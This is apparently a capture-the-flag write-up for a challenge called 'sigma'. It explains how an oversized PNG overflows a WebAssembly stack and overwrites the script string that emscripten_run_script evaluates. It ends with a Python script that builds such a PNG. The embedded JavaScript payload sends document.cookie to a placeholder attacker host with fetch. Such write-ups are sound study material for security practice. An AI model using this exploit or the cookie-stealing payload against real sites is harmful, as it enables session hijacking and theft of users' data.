# sigma Take a look at _emscripten_run_script Pass a 30 to 40 KB png, you can see that the console reports Uncaught (in promise) RuntimeError: Aborted(Stack overflow! Stack cookie has been overwritten, expected hex dwords 0x89BACDFE and 0x2135467, but received 0xa37a4d42 a383), and found a block of wasm Memory is overwritten by png data It is probably to construct a png, so that the memory read by call $env.emscripten_run_script is overwritten when this wasm is parsed ![](https://i.imgur.com/Dertm2b.png) Wasm will convert PNG to RGBA and store it somewhere, this place is implemented like a stack Try to construct a png to see what the stack looks like (The parts at the end of DD in the picture are all PNG files constructed by me) ![](https://i.imgur.com/nMZBp20.png) A little further up from this place is the place where run_script will read the js code. ![](https://i.imgur.com/BCahXFi.png) When the PNG pixels are larger than 750000, the stack will overflow, and when the PNG pixels are about 750859 pixels, the cookie in the error message will be overwritten. Probably this means that the stack overflow overwrites the code to be read by run_script, and that code will eventually be eval This picture is a PNG of 750,000 pixels, and the address below is 2242832+3000032. At the beginning, he has to verify whether it has been overwritten (probably to check for overflow?), so the pixel RGBA after the constructed PNG with 750,000 pixels must meet the original memory of 750,000 pixels Content ![](https://i.imgur.com/EbwE2Yd.png) then use xss payload ```python from PIL import Image import random qwq = [] def num2color(n): ret = [] while True: s = n // 256 ret.append(n % 256) if s==0: break n = s ret.reverse() while len(ret) <3: ret = [0] + ret return tuple(ret) for i in range(1 * 750000): #u = (*num2color(i), 0xcc) u = (0,0,0,0xcc) qwq.append(u) origin_mem = "\x42\x20\x04\x42\xEF\xBE\xAD\xDE\x8B\x59\x00\x00\x58\x0D\x50\x00" origin_mem += "-+ 0X0x\00-0X+0X 0X-0x+0x 0x\00!num_bits\00tinfl_decompress\00nan\00inf\00miniz.c\00NAN\00INF\00.\00II*\00fetch('//{ip:port}', {mode: 'no-cors', method: 'POST', body: JSON.stringify(document.cookie)});\00(null" print(len(origin_mem)) assert(len(origin_mem) % 4 == 0) pic = Image.new("RGBA", (1, 750000+len(origin_mem))) for i in range(len(origin_mem)//4): data = origin_mem[i*4:i*4+4] pixel = ( 255-ord(data[0]), 255-ord(data[1]), 255-ord(data[2]), ord(data[3]) ) qwq.append(pixel) pic.putdata(qwq) pic.save("./out.png", "PNG") ```